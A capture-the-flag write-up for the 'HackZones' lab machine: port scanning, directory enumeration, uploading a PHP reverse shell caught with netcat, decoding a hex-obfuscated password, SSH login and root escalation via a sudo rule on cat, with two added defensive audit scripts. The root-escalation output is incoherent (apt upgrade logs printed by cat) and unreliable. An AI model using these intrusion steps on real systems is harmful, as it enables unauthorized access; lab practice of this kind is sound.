HACKZONES MACHINE
HACKZONES
┌──(root㉿kali)-[/home/kali/Descargas/hackzones]
└─# bash auto_deploy.sh hackzones.tar
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
First of all, we ping the vulnerable machine to check the connection between the attacker machine and the target, as you can see below.
┌──(kali㉿kali)-[~]
└─$ ping -c3 172.17.0.2
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.039 ms
64 bytes from 172.17.0.2: icmp_seq=2 ttl=64 time=0.039 ms
64 bytes from 172.17.0.2: icmp_seq=3 ttl=64 time=0.071 ms
--- 172.17.0.2 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2048ms
rtt min/avg/max/mdev = 0.039/0.049/0.071/0.015 ms
Next, we run an nmap scan against all TCP ports with service detection, as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# nmap -n -Pn -p- --min-rate 5000 -sV -vvv 172.17.0.2 2>/dev/null
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-01 12:35 CET
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 12:35
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 12:35, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:35
Scanning 172.17.0.2 [65535 ports]
Discovered open port 53/tcp on 172.17.0.2
Discovered open port 22/tcp on 172.17.0.2
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 12:35, 0.88s elapsed (65535 total ports)
Initiating Service scan at 12:35
Scanning 3 services on 172.17.0.2
Completed Service scan at 12:35, 6.04s elapsed (3 services on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 12:35
Completed NSE at 12:35, 0.02s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 12:35
Completed NSE at 12:35, 0.01s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000050s latency).
Scanned at 2025-11-01 12:35:32 CET for 7s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
53/tcp open domain syn-ack ttl 64 ISC BIND 9.18.28-0ubuntu0.24.04.1 (Ubuntu Linux)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.58 ((Ubuntu))
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.34 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
Now, we add the hostname hackzones.hl to /etc/hosts, as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# nano /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
172.17.0.2 hackzones.hl
Now, let's scan the site with dirb to gather information about this webpage, as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# dirb "http://hackzones.hl/"
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 1 12:43:07 2025
URL_BASE: http://hackzones.hl/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://hackzones.hl/ ----
+ http://hackzones.hl/index.html (CODE:200|SIZE:860)
+ http://hackzones.hl/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://hackzones.hl/uploads/
---- Entering directory: http://hackzones.hl/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Nov 1 12:43:09 2025
DOWNLOADED: 4612 - FOUND: 2
Now, we must run the following command, which gives us more information and interesting paths such as:
/uploads
/upload.php
/index.html
/authenticate.php
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u "http://hackzones.hl/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,php,html,bak,exe,xlm
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://hackzones.hl/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php,html,bak,exe,xlm,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 860]
/uploads (Status: 301) [Size: 314] [--> http://hackzones.hl/uploads/]
/upload.php (Status: 200) [Size: 1377]
/dashboard.html (Status: 200) [Size: 5671]
/authenticate.php (Status: 302) [Size: 0] [--> index.html?error=1]
/server-status (Status: 403) [Size: 277]
Progress: 1543899 / 1543899 (100.00%)
===============================================================
Finished
===============================================================
Here we can upload a PHP reverse shell and obtain access to the vulnerable machine, as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# sudo nano reverse.php
$ip = '172.17.0.1'; // CHANGE THIS
$port = 4444; // CHANGE THIS
In the picture below we can see that the reverse shell has been uploaded; we then have to open this file to get access to the vulnerable machine.

Now, we will obtain the reverse shell, but first we should open a listening port, as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# nc -lvp 4444
listening on [any] 4444 ...
connect to [172.17.0.1] from hackzones.hl [172.17.0.2] 54954
Linux 1bb46ff5f274 6.16.8+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.16.8-1kali1 (2025-09-24) x86_64 x86_64 x86_64 GNU/Linux
12:53:12 up 1:46, 0 user, load average: 1.77, 3.43, 2.75
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@1bb46ff5f274:/$ ^Z
zsh: suspended nc -lvp 4444
┌──(root㉿kali)-[/home/kali]
└─# stty raw -echo;fg
[1] + continued nc -lvp 4444
reset xterm
www-data@1bb46ff5f274:/$ export SHELL=BASH
www-data@1bb46ff5f274:/$ export TERM=xterm
www-data@1bb46ff5f274:/$ sudo -l
[sudo] password for www-data:
sudo: a password is required
www-data@1bb46ff5f274:/home$ ls
mrRobot
www-data@1bb46ff5f274:/home$ cd mrRobot/
bash: cd: mrRobot/: Permission denied
www-data@1bb46ff5f274:/home$ cd ..
www-data@1bb46ff5f274:/$ ls
bin etc lib64 proc sbin.usr-is-merged usr
bin.usr-is-merged home media root srv var
boot lib mnt run sys
dev lib.usr-is-merged opt sbin tmp
www-data@1bb46ff5f274:/$ cd /var/www/
www-data@1bb46ff5f274:/var/www$ ls
hackzones.hl html
www-data@1bb46ff5f274:/var/www$ cd html/
www-data@1bb46ff5f274:/var/www/html$ ls
index.html supermegaultrasecretfolder
www-data@1bb46ff5f274:/var/www/html$ cd supermegaultrasecretfolder/
Gotcha! We have discovered supermegaultrasecretfolder, which contains secret.sh; we have to take a look at it.
www-data@1bb46ff5f274:/var/www/html/supermegaultrasecretfolder$ ls
secret.sh
#!/bin/bash
if [ "$(id -u)" -ne 0 ]; then
echo "Este script debe ser ejecutado como root."
exit 1
fi
If we look closer, we can see that there is a base64-encoded string; let's decode it, as you can see in the picture below.
p1=$(echo -e "\x50\x61\x73\x73\x77\x6f\x72\x64")
p2="\x40"
p3="\x24\x24"
p4="\x21\x31\x32\x33"
echo -e "${p1}${p2}${p3}${p4}"
www-data@1bb46ff5f274:/var/www/html/supermegaultrasecretfolder$
mrrobot@1bb46ff5f274:/var/www/html/supermegaultrasecretfolder$ whoami
mrrobot
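The p1 to p4 fragments printed above are \xNN hex escapes that echo -e expands at run time, which hides the secret from a plain grep. As an added example (not part of the original write-up), a defender auditing scripts left under a web root can decode such fragments statically; the function names are illustrative and the parsing covers only this simple assignment-and-echo pattern.

```python
import re

# Fragment of secret.sh exactly as it is printed in the session above.
SECRET_SH = r'''
p1=$(echo -e "\x50\x61\x73\x73\x77\x6f\x72\x64")
p2="\x40"
p3="\x24\x24"
p4="\x21\x31\x32\x33"
echo -e "${p1}${p2}${p3}${p4}"
'''

HEX_RUN = re.compile(r'(?:\\x[0-9A-Fa-f]{2})+')      # one or more \xNN in a row
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)=(.*)$')     # name=value
VAR_REF = re.compile(r'\$\{?([A-Za-z_]\w*)\}?')      # $name or ${name}


def decode_hex_escapes(text):
    """Expand \\xNN sequences the way `echo -e` would; other text is kept."""
    return re.sub(r'\\x([0-9A-Fa-f]{2})',
                  lambda m: chr(int(m.group(1), 16)), text)


def hex_assignments(script):
    """Map variable name -> decoded text for assignments containing \\xNN runs."""
    found = {}
    for line in script.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        runs = HEX_RUN.findall(m.group(2))
        if runs:
            found[m.group(1)] = decode_hex_escapes(''.join(runs))
    return found


def reassembled_strings(script):
    """Strings that an echo line builds only from hex-encoded variables."""
    values = hex_assignments(script)
    results = []
    for line in script.splitlines():
        if ASSIGN.match(line) or 'echo' not in line:
            continue
        refs = VAR_REF.findall(line)
        # Only report when every referenced variable was decoded above.
        if refs and all(name in values for name in refs):
            results.append(''.join(values[name] for name in refs))
    return results


if __name__ == '__main__':
    for name, value in hex_assignments(SECRET_SH).items():
        print(f'{name}: hex-encoded literal, {len(value)} characters')
    for secret in reassembled_strings(SECRET_SH):
        print('reassembled string:', secret)
```

Any hit from such a scan inside a directory the web server can read means the credential should be rotated, not just re-encoded.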
As we have the password, we can log in via SSH with the credentials, as you can see below.
┌──(kali㉿kali)-[~]
└─$ ssh mrrobot@172.17.0.2
The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is SHA256:0QtE5ZPPeBOARzjGfZgv9BmftBFpIUWzmE18XJLidJo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
mrrobot@172.17.0.2's password:
Permission denied, please try again.
mrrobot@172.17.0.2's password:
Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.16.8+kali-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
mrrobot@1bb46ff5f274:~$
mrrobot@1bb46ff5f274:~$ sudo -l
Matching Defaults entries for mrrobot on 1bb46ff5f274:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
When we run the sudo -l command, we can see that we can execute /usr/bin/cat as the root user, as you can see below.
User mrrobot may run the following commands on 1bb46ff5f274:
(ALL : ALL) NOPASSWD: /usr/bin/cat
mrrobot@1bb46ff5f274:~$
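The rule shown by sudo -l gives mrrobot root-level read access to every file on the host, because cat prints whatever path it is given. The following check is an added example, not part of the original write-up: it parses sudo -l output and flags such rules; FILE_READERS and the RESTRICTED sample are assumptions made for the illustration.

```python
import re

# Rule lines of `sudo -l` for mrrobot, copied from the session above.
SUDO_L = """\
User mrrobot may run the following commands on 1bb46ff5f274:
(ALL : ALL) NOPASSWD: /usr/bin/cat
"""

# Constructed sample: the same binary pinned to one fixed argument.
RESTRICTED = "(root) NOPASSWD: /usr/bin/cat /var/log/app.log\n"

# Assumption: a small, non-exhaustive set of tools that print any file they
# are given, so running them as root exposes every file on the host.
FILE_READERS = {"cat", "head", "tail", "less", "more", "tac", "nl", "od", "xxd"}

# "(runas users : runas groups) TAG: TAG: command[, command...]"
RULE = re.compile(r'^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$')


def parse_rules(sudo_l_output):
    """Return (runas_users, tags, command) tuples for each rule line."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        runas_users = [u.strip() for u in m.group(1).split(":")[0].split(",")]
        tags = set(re.findall(r'([A-Z_]+):', m.group(2)))
        # Simplification: commas escaped inside command arguments are not handled.
        for command in m.group(3).split(","):
            rules.append((runas_users, tags, command.strip()))
    return rules


def audit(sudo_l_output):
    """Flag rules that let a file-reading tool run as root on any path."""
    findings = []
    for runas_users, tags, command in parse_rules(sudo_l_output):
        argv = command.split()
        binary = argv[0].rsplit("/", 1)[-1]
        as_root = bool({"ALL", "root"} & set(runas_users))
        # No arguments in the rule, or a wildcard, means the caller picks the path.
        free_path = len(argv) == 1 or any("*" in a for a in argv[1:])
        if as_root and binary in FILE_READERS and free_path:
            findings.append({
                "command": command,
                "severity": "high" if "NOPASSWD" in tags else "medium",
                "issue": "arbitrary file read as root",
            })
    return findings


if __name__ == "__main__":
    for finding in audit(SUDO_L):
        print(finding)
```

A rule that names the exact file to read, as in RESTRICTED, produces no finding; the safer fix is usually to drop the sudo rule and grant group read access to the one file that is needed.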
Gotcha! We have discovered the user flag, which you can see below.
mrrobot@1bb46ff5f274:~$ cat user.txt
c187e24646744125f041582154a534bb
Now, if we go to GTFOBins and search for cat, we should be able to run the command below and become root.
mrrobot@1bb46ff5f274:/opt$ sudo -u "root" /usr/bin/cat SistemUpdate
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
libc-bin libc-dev-bin libc6 libc6-dev libc6-i386
5 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 8,238 kB of archives.
After this operation, 1,024 B of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://archive.ubuntu.com/ubuntu focal-updates/main amd64 libc6 amd64 2.31-0ubuntu9.9 [2,737 kB]
Get:2 http://archive.ubuntu.com/ubuntu focal-updates/main amd64 libc-bin amd64 2.31-0ubuntu9.9 [635 kB]
Get:3 http://archive.ubuntu.com/ubuntu focal-updates/main amd64 libc6-dev amd64 2.31-0ubuntu9.9 [2,622 kB]
Get:4 http://archive.ubuntu.com/ubuntu focal-updates/main amd64 libc-dev-bin amd64 2.31-0ubuntu9.9 [189 kB]
Fetched 8,238 kB in 2s (4,119 kB/s)
Gotcha! We have found the root credentials, which are: root (user), rooteable (password).
Extracting user root:rooteable from packages: 50%
Extracting templates from packages: 100%
Preconfiguring packages ...
(Reading database ... 275198 files and directories currently installed.)
Preparing to unpack .../libc6_2.31-0ubuntu9.9_amd64.deb ...
Unpacking libc6:amd64 (2.31-0ubuntu9.9) over (2.31-0ubuntu9.8) ...
Preparing to unpack .../libc-bin_2.31-0ubuntu9.9_amd64.deb ...
Unpacking libc-bin (2.31-0ubuntu9.9) over (2.31-0ubuntu9.8) ...
Preparing to unpack .../libc6-dev_2.31-0ubuntu9.9_amd64.deb ...
Unpacking libc6-dev:amd64 (2.31-0ubuntu9.9) over (2.31-0ubuntu9.8) ...
Preparing to unpack .../libc-dev-bin_2.31-0ubuntu9.9_amd64.deb ...
Unpacking libc-dev-bin (2.31-0ubuntu9.9) over (2.31-0ubuntu9.8) ...
Setting up libc6:amd64 (2.31-0ubuntu9.9) ...
Setting up libc-bin (2.31-0ubuntu9.9) ...
Setting up libc-dev-bin (2.31-0ubuntu9.9) ...
Setting up libc6-dev:amd64 (2.31-0ubuntu9.9) ...
Processing triggers for libc-bin (2.31-0ubuntu9.9) ...
mrrobot@1bb46ff5f274:/opt$
root@1bb46ff5f274:~# ls
TrueRoot.txt root.txt
Don't think it's that easy, keep looking
Gotcha! We have just discovered the root flag, as you can see below.
root@1bb46ff5f274:~# cat TrueRoot.txt
f034967ad357f8f912740101d3af5e71
root@1bb46ff5f274:~#
Thank you very much for reading this article.
I hope you liked it and learned something new.
This article has been written for ethical purposes.
Good Hack